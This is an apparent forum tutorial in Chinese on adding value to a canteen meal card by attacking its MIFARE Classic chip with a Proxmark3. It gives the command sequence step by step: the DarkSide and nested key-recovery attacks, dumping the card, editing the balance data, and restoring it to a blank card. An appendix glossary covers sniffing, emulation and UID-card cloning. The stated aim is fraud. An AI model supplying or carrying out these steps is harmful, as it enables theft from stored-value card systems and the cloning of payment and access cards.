對于無線射頻卡RFID小弟有所研究今日分享一篇關于修改飯卡金額的文章
如果對ID,IC卡還不是很了解先看看raidwar的文章把,驅動什么的請自行百度
以及命令幫助
使用Proxmark3進行MIFARE Classic卡的安全測試
以及數據分析
下面進入正題
首先
驅動裝好之后可以看到設備管理器中查看 發現proxmark3使用是COM5端口
proxmark3.exe COM5
hw tune
成功后如下顯示
此時講自己的高頻卡放上去然后直接使用命令
hf mf mifare
如果
找到 validkey 則直接使用命令:?
(必須知道一個正確的Key方可進行相關的操作)
hf mf nested 1 0 A ffffffffffff
基于驗證漏洞進行全卡區域Key破解?
如果結果為
則 ? 再次進行漏洞循環破解
hf mf mifare 524bb6a2?
直到找到正確密碼為止(顯示Found valid key)
找到密碼后使用(測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區Keys)
hf mf nested 1 0 A ffffffffffff d
導出密碼二進制文件,接著使用
hf mf dump
dump數據到bin文件 后分析修改數據后再次導入
使用命令以二進制方式恢復數據到空白的MIFARE classic卡
hf mf restore
完成
附錄
hf mf (MIFARE卡的相關命令...)
help顯示幫助
dbg設置默認調試模式
rdbl讀取MIFARE classic卡的區塊數據
rdsc讀取MIFARE classic卡的扇區數據
dump導出MIFARE classic卡的數據到二進制文件
restore從二進制文件恢復數據到空白的MIFARE classic卡
wrbl改寫MIFARE classic卡的區塊數據
chk測試MIFARE classic卡的各個區塊KEY A/B
mifare基于PRNG漏洞,執行mifare “DarkSide”攻擊操作
nested測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區Keys
sniff嗅卡片與讀寫器之間的通訊(等同于hf 14a snoop)
sim模擬一個MIFARE卡片
eclr清除仿真內存的各區塊數據
eget獲取仿真內存的各區塊數據
eset設置仿真內存的各區塊數據
eload從導出的文件加載仿真數據
esave導出保存仿真數據到文件
ecfill利用仿真器的keys來填補仿真內存
ekeyprn打印輸出仿真內存中的keys
csetuid直接設置可改UID卡的UID
csetblk把對應區塊數據寫入UID卡
cgetblk讀取UID卡對應區塊數據
cgetsc讀取UID卡對應扇區數據
cload寫入dump數據到UID卡。注意
csave保存UID卡數據到文件或者仿真內存